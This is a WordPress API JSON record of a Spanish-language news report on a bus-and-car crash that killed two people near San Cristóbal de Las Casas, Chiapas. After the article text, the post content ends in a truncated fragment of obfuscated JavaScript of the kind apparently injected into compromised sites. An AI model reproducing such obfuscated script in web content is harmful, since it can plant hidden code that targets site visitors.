{"id":25683,"date":"2025-12-10T03:12:10","date_gmt":"2025-12-10T03:12:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25683"},"modified":"2025-12-10T03:12:10","modified_gmt":"2025-12-10T03:12:10","slug":"mueren-dos-personas-en-choque-frontal-entre-autobus-y-auto-compacto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25683","title":{"rendered":"Mueren dos personas en choque frontal entre autob\u00fas y auto compacto"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25684\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484554-1024x576.jpg\" alt=\"\" class=\"wp-image-25684\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484554-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484554-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484554-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484554.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"658\" data-id=\"25685\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484551-1024x658.jpg\" alt=\"\" class=\"wp-image-25685\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484551-1024x658.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484551-300x193.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484551-768x493.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484551.jpg 1208w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25686\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484548-1024x576.jpg\" alt=\"\" class=\"wp-image-25686\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484548-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484548-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484548-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000484548.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>9 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- Dos personas fallecieron este martes luego de un fuerte accidente registrado a la altura del kil\u00f3metro 36+600 de la carretera de cuota San Crist\u00f3bal\u2013Chiapa de Corzo, donde un autob\u00fas de la l\u00ednea ADO se vio involucrado en un choque frontal contra un autom\u00f3vil Chevrolet Corsa. El impacto dej\u00f3 el auto pr\u00e1cticamente destruido.<\/p>\n\n\n\n<p>Personal del Cuerpo de Bomberos de San Crist\u00f3bal de Las Casas lleg\u00f3 al sitio y confirm\u00f3 que las v\u00edctimas permanec\u00edan atrapadas entre los restos del veh\u00edculo compacto. Utilizando equipo hidr\u00e1ulico, los rescatistas realizaron maniobras para recuperar los cuerpos.<\/p>\n\n\n\n<p>Mientras tanto, los pasajeros del autob\u00fas fueron revisados por param\u00e9dicos para descartar lesiones, en tanto la zona fue acordonada para permitir el trabajo del Ministerio P\u00fablico, encargado de las diligencias y del levantamiento de los cuerpos.<\/p>\n\n\n\n<p>La colisi\u00f3n gener\u00f3 importantes da\u00f1os materiales y moviliz\u00f3 a corporaciones de emergencia y voluntarios, quienes colaboraron en las tareas de atenci\u00f3n y apoyo tras el fatal accidente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal9 de diciembre del 2025. San Crist\u00f3bal de Las Casas.- Dos personas fallecieron este martes luego de un fuerte accidente registrado a la altura del kil\u00f3metro 36+600 de la carretera de cuota San Crist\u00f3bal\u2013Chiapa de Corzo, donde un autob\u00fas de la l\u00ednea ADO se vio involucrado en un choque frontal contra un autom\u00f3vil &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25685,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-25683","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25683","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25683"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25683\/revisions"}],"predecessor-version":[{"id":25687,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25683\/revisions\/25687"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25685"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25683"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25683"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25683"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}